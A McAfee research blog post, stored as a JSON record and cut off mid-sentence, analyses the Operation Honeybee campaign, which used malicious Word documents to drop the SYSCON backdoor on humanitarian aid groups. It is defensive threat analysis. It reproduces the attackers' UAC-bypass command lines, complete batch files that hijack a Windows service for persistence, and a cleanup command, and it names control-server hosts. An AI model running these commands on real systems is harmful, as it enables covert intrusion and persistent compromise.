{"id":84860,"date":"2018-03-02T05:00:10","date_gmt":"2018-03-02T13:00:10","guid":{"rendered":"https:\/\/securingtomorrow.mcafee.com\/?p=84860"},"modified":"2025-06-02T20:38:01","modified_gmt":"2025-06-03T03:38:01","slug":"mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/","title":{"rendered":"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups"},"content":{"rendered":"<p><em>This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0<\/em><\/p>\n<p>McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks.<\/p>\n<p>Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them.<\/p>\n<p>The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15\u201317.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84862\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\" alt=\"\" width=\"1253\" height=\"847\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png 1253w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1-300x203.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1-768x519.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1-1024x692.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1-740x500.png 740w\" sizes=\"auto, (max-width: 1253px) 100vw, 1253px\" \/><\/a><\/p>\n<h2><strong>Background<\/strong><\/h2>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84863\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-2.png\" alt=\"\" width=\"1329\" height=\"401\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-2.png 1329w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-2-300x91.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-2-768x232.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-2-1024x309.png 1024w\" sizes=\"auto, (max-width: 1329px) 100vw, 1329px\" \/><\/a><\/p>\n<p>On January 15, Advanced Threat Research discovered an operation using a new variant of the <a href=\"https:\/\/www.securityweek.com\/backdoor-uses-ftp-server-cc\" target=\"_blank\" rel=\"noopener\">SYSCON backdoor.<\/a> The Korean-language Word document manual.doc appeared in Vietnam on January 17, with the original author name of Honeybee.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-84864 size-medium\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-3-300x228.png\" alt=\"\" width=\"300\" height=\"228\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-3-300x228.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-3-768x584.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-3-658x500.png 658w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-3.png 788w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><em>Document properties.<\/em><\/p>\n<p>This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen this in previous operations using SYSCON. This key was also used in the Honeybee campaign and appears to have been used since August 2017.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-84865 size-medium\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-4-300x180.png\" alt=\"\" width=\"300\" height=\"180\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-4-300x180.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-4.png 699w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-5.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-84866 size-medium\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-5-300x178.png\" alt=\"\" width=\"300\" height=\"178\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-5-300x178.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-5-768x456.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-5.png 820w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-6.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-84867 size-medium\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-6-300x180.png\" alt=\"\" width=\"300\" height=\"180\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-6-300x180.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-6.png 760w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><em>Examples of decoy documents.<\/em><\/p>\n<p>Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code and author name as Honeybee. Some of the malicious documents were test files without the implant. From our analysis, most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These Honeybee documents did not contain any specific lures, rather variations of a \u201cnot compatible\u201d message attempting to convince the user to enable content.<\/p>\n<p>We also observed a related malicious document created January 12 by the author Windows User that contained a different encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee documents. This document, \u201cInternational Federation of Red Cross and Red Crescent Societies \u2013 DPRK Country Office,\u201d drops an implant with the control server address 1113427185.ifastnet.org, which resolves to the same server used by the implants dropped in the Honeybee case.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-7.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84868\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-7.png\" alt=\"\" width=\"510\" height=\"240\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-7.png 510w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-7-300x141.png 300w\" sizes=\"auto, (max-width: 510px) 100vw, 510px\" \/><\/a><\/p>\n<p><em>The directory contents of control server 1113427185.ifastnet.org.<\/em><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-8.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84869\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-8.png\" alt=\"\" width=\"489\" height=\"233\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-8.png 489w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-8-300x143.png 300w\" sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/a><\/p>\n<p><em>The directory contents of ftp.byethost11.com, from Honeybee samples.<\/em><\/p>\n<p><strong>\u00a0<a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-9.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84870\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-9.png\" alt=\"\" width=\"752\" height=\"616\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-9.png 752w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-9-300x246.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-9-610x500.png 610w\" sizes=\"auto, (max-width: 752px) 100vw, 752px\" \/><\/a><\/strong><\/p>\n<p><em>Log files of compromised machines from February 2018 Honeybee samples.<\/em><\/p>\n<h3><strong>MaoCheng Dropper<\/strong><\/h3>\n<p>Aside from finding the malicious documents, the Advanced Threat Research team discovered a Win32-based executable dropper. This dropper uses a stolen digital signature from Adobe Systems. This certificate is also used by another Korean-language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting program database (PDB) path.<\/p>\n<p style=\"padding-left: 30px;\">D:\\Task\\DDE Attack\\MaoCheng\\Release\\Dropper.pdb<\/p>\n<p>The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same type of malware as observed with the other Word documents. This sample also dropped a decoy document with the author name Honeybee. This sample, however, contained a bug that interfered with the execution flow of the dropper, suggesting that the authors did not test the malware after code signing it.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-10.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84871\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-10.png\" alt=\"\" width=\"327\" height=\"208\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-10.png 327w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-10-300x191.png 300w\" sizes=\"auto, (max-width: 327px) 100vw, 327px\" \/><\/a><\/p>\n<p>The decoy document uses the cloud-based accounting software company Xero as a lure:<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84872\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11.png\" alt=\"\" width=\"793\" height=\"784\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11.png 793w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-300x297.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-768x759.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-506x500.png 506w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-32x32.png 32w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-50x50.png 50w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-64x64.png 64w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-96x96.png 96w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-11-128x128.png 128w\" sizes=\"auto, (max-width: 793px) 100vw, 793px\" \/><\/a><\/p>\n<p><em>A decoy document from MaoCheng dropper. <\/em><\/p>\n<h2><strong>Possible Operator <\/strong><\/h2>\n<p>The Advanced Threat Research team has identified the following persona (snoopykiller@mail.ru) tied to this recent operation. Based on our analysis, the actor registered two free hosting accounts: navermail.byethost3.com, which refers to the popular South Korean search engine, and nihon.byethost11.com. The email address was used to register a free account for a control server in all the implants described in our analysis.<strong>\u00a0<\/strong><\/p>\n<h2><strong>Technical Analysis<\/strong><\/h2>\n<p>Let\u2019s start with an overview of the attack:<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-attack-12.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84873\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-attack-12.png\" alt=\"\" width=\"773\" height=\"859\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-attack-12.png 773w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-attack-12-270x300.png 270w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-attack-12-768x853.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-attack-12-450x500.png 450w\" sizes=\"auto, (max-width: 773px) 100vw, 773px\" \/><\/a><\/p>\n<p>We continue with the components involved in this operation.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84874\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-13.png\" alt=\"\" width=\"973\" height=\"667\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-13.png 973w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-13-300x206.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-13-768x526.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-13-729x500.png 729w\" sizes=\"auto, (max-width: 973px) 100vw, 973px\" \/><\/a><\/p>\n<p>The malicious Word file is the beginning of the infection chain and acts as a dropper for two DLL files. The Word file contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document_Open() autoload function. The word file also contains a Base64-encoded file (encoded with a custom key) in it that is read, decoded, and dropped to the disk by the macro.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-14.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84875\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-14.png\" alt=\"\" width=\"1221\" height=\"418\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-14.png 1221w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-14-300x103.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-14-768x263.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-14-1024x351.png 1024w\" sizes=\"auto, (max-width: 1221px) 100vw, 1221px\" \/><\/a><\/p>\n<p><em>The Document_Open() subroutine implementing the malicious functionality.<\/em><\/p>\n<p>The Visual Basic macro performs the following tasks:<\/p>\n<ul>\n<li>Opens a handle to the malicious document to read the encoded CAB file<\/li>\n<li>Decodes the CAB file and writes it to the disk at %temp%\\setup.cab<\/li>\n<\/ul>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84876\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-15.png\" alt=\"\" width=\"679\" height=\"896\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-15.png 679w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-15-227x300.png 227w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-15-379x500.png 379w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/a><\/p>\n<p><em>Encoded CAB file in the Word document.<\/em><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-16.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84877\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-16.png\" alt=\"\" width=\"595\" height=\"203\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-16.png 595w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-16-300x102.png 300w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><\/a><\/p>\n<p><em>Decoding and writing the CAB file to %temp%.<\/em><\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-17.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84878\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-17.png\" alt=\"\" width=\"1005\" height=\"320\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-17.png 1005w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-17-300x96.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-17-768x245.png 768w\" sizes=\"auto, (max-width: 1005px) 100vw, 1005px\" \/><\/a><\/p>\n<p><em>The decoded CAB file in the Visual Basic memory buffer.<\/em><\/p>\n<p>The CAB file contains the following files and functions:<\/p>\n<ul>\n<li>dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass). The DLL contains the following PDB path: <em>D:\\Task\\MiMul\\NTWDBLIB\\Release\\NTWDBLIB.pdb.<\/em><\/li>\n<li>bat: A batch file to set up the service COMSysApp, for an x64 system<\/li>\n<li>bat: A batch file to set up the service COMSysApp, for an x86 system<\/li>\n<li>ini: A data file with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini file.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84944\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/03\/11.png\" alt=\"\" width=\"631\" height=\"58\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/03\/11.png 631w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/03\/11-300x28.png 300w\" sizes=\"auto, (max-width: 631px) 100vw, 631px\" \/><\/p>\n<p><em>Decoded credential data contained in ipnet.ini.<\/em><em>\u00a0<\/em><\/p>\n<ul>\n<li>dll: The malicious DLL file run as a service (using svchost.exe). The DLL contains the following PDB path: D:\\Task\\MiMul\\FTPCom_vs10\\Release\\Engine.pdb.<\/li>\n<li>The macro then extracts the CAB file into %systemroo%\\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts<\/li>\n<li>Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections)<\/li>\n<li>Command lines used by the Visual Basic macro:<\/li>\n<\/ul>\n<pre>cmd \/c wusa %TEMP%\\setup.cab \/quiet \/extract:%SystemRoot%\\System32 &amp;&amp; del \/f \/q %TEMP%\\setup.cab &amp;&amp; cliconfg.exe\r\ncmd \/c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32 &amp;&amp; del \/f \/q %TEMP%\\setup.cab &amp;&amp; cliconfg.exe<\/pre>\n<p>A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows. UAC bypass via DLL hijacking requires:<\/p>\n<ul>\n<li>A Windows executable with the auto-elevate property in its manifest<\/li>\n<li>A Windows executable in a secure directory (%systemroot%\\system32)<\/li>\n<\/ul>\n<p>The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\\system32):<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-19.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84880\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-19.png\" alt=\"\" width=\"680\" height=\"133\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-19.png 680w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-19-300x59.png 300w\" sizes=\"auto, (max-width: 680px) 100vw, 680px\" \/><\/a><\/p>\n<p><em>NTWDBLIB executing the installer batch files under the context of cliconfg.exe.<\/em><strong>\u00a0<\/strong><\/p>\n<p>The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86):<\/p>\n<h4><strong>install1.bat (x64)<\/strong><\/h4>\n<pre>@echo off\r\nsc stop COMSysApp\r\nsc config COMSysApp type= own start= <strong>auto<\/strong> error= normal binpath= \"%windir%\\SysWOW64\\svchost.exe -k COMSysApp\"\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost\" \/v COMSysApp \/t REG_MULTI_SZ \/d \"COMSysApp\" \/f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\COMSysApp\\Parameters\" \/v ServiceDll \/t REG_EXPAND_SZ \/d \"%windir%\\SysWOW64\\<strong>ipnet.dll<\/strong>\" \/f\r\nsc start COMSysApp\r\ndel \/f \/q %windir%\\SysWOW64\\install2.bat\r\ndel \/f \/q %windir%\\SysWOW64\\install1.bat<\/pre>\n<h4><\/h4>\n<h4><strong>install2.bat (x86)<\/strong><\/h4>\n<pre>@echo off\r\nsc stop COMSysApp\r\nsc config COMSysApp type= own start= <strong>auto<\/strong> error= normal binpath= \"%windir%\\System32\\svchost.exe -k COMSysApp\"\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost\" \/v COMSysApp \/t REG_MULTI_SZ \/d \"COMSysApp\" \/f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\COMSysApp\\Parameters\" \/v ServiceDll \/t REG_EXPAND_SZ \/d \"%windir%\\system32\\<strong>ipnet.dll<\/strong>\" \/f\r\nsc start COMSysApp\r\ndel \/f \/q %windir%\\System32\\install1.bat\r\ndel \/f \/q %windir%\\System32\\install2.bat<\/pre>\n<p>The batch files perform these tasks:<\/p>\n<ul>\n<li>Stop the service COMSysApp<\/li>\n<li>Configure the service to autostart (to set up persistence on the system)<\/li>\n<li>Modify registry keys to launch the DLL unser svchost.exe<\/li>\n<li>Specify the malicious DLL path to be loaded into the svchost process.<\/li>\n<li>Immediately restart the service<\/li>\n<li>Remove the batch files to reduce the fingerprint on the system<strong>\u00a0<\/strong><\/li>\n<\/ul>\n<p>IPNet.dll runs as a service under svchost.exe.<\/p>\n<p>The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using:<\/p>\n<pre style=\"padding-left: 30px;\">cmd \/c taskkill \/im cliconfg.exe \/f \/t &amp;&amp; del \/f \/q NTWDBLIB.DLL<\/pre>\n<p>All the following capabilities described are implemented by the malicious service DLL implant unless specified.<strong>\u00a0<\/strong><strong>\u00a0<\/strong><\/p>\n<h2><strong>Variant using North Korean Red Cross<\/strong><\/h2>\n<p>Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key. This document was created January 10.<\/p>\n<p><a href=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-20.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84881\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-20.png\" alt=\"\" width=\"662\" height=\"354\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-20.png 662w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-20-300x160.png 300w\" sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><\/a><\/p>\n<p><em>Contents of the decoy document.<\/em><\/p>\n<p>This variant also consists of two CAB files that are dropped to %temp%, depending on the OS (x86 or x64).<\/p>\n<p>The key differences in this variant:<\/p>\n<ul>\n<li>Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file<\/li>\n<li>There is one CAB file for an x86 system and another for an x64 system<\/li>\n<li>This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass\n<ul>\n<li>exe is the program vulnerable to the UAC bypass attack<\/li>\n<li>dll runs install.bat to set up the service (same as NTWDBLIB.dll)<\/li>\n<\/ul>\n<\/li>\n<li>exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.<\/li>\n<li>The Visual Basic macro uses the following command line:<\/li>\n<\/ul>\n<pre>cmd \/c expand %TEMP%\\setup.cab -F:* %TEMP% &amp;&amp; cd \/d %TEMP% &amp;&amp; del \/f \/q setup.cab &amp;&amp; uacme.exe<\/pre>\n<ul>\n<li>The control server credential information contained in the CAB files is different:<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84945\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/03\/31.png\" alt=\"\" width=\"631\" height=\"58\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/03\/31.png 631w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/03\/31-300x28.png 300w\" sizes=\"auto, (max-width: 631px) 100vw, 631px\" \/><\/p>\n<p><em>Decoded credential data contained in another ipnet.ini.<\/em><\/p>\n<p>Similarities between this variant and the original malware sample:<\/p>\n<ul>\n<li>Service name is the same: COMSysApp<\/li>\n<li>The DLL and ini files contain the same functions as described elsewhere in this post<\/li>\n<\/ul>\n<h2><strong>Data Reconnaissance<\/strong><\/h2>\n<p>The following information is gathered from the endpoint and sent to the control server.<\/p>\n<ul>\n<li>System info:\n<ul>\n<li>Computer name<\/li>\n<li>System info using: cmd \/c systeminfo &gt;%temp%\\temp.ini<\/li>\n<li>List of currently running process using: cmd \/c tasklist &gt;%temp%\\temp.ini<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2><strong>Exfiltration<\/strong><\/h2>\n<ul>\n<li>The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern:<\/li>\n<\/ul>\n<p>From &lt;COMPUTER-NAME&gt; (&lt;Month&gt;-&lt;Day&gt; &lt;Hour&gt;-&lt;Minute&gt;-&lt;Second&gt;).txt. For example, From &lt;COMPUTER-NAME&gt; (01-04 11-40-02).txt<\/p>\n<ul>\n<li>All the text files are now packed into the archive temp.zip (%temp%\\temp.zip)<\/li>\n<li>zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt<\/li>\n<li>txt is uploaded to the control server<\/li>\n<\/ul>\n<h2><strong>Additional Commands and Capabilities<\/strong><\/h2>\n<p>The service-based DLL implant traverses to the \/htdocs\/ directory on the FTP server and 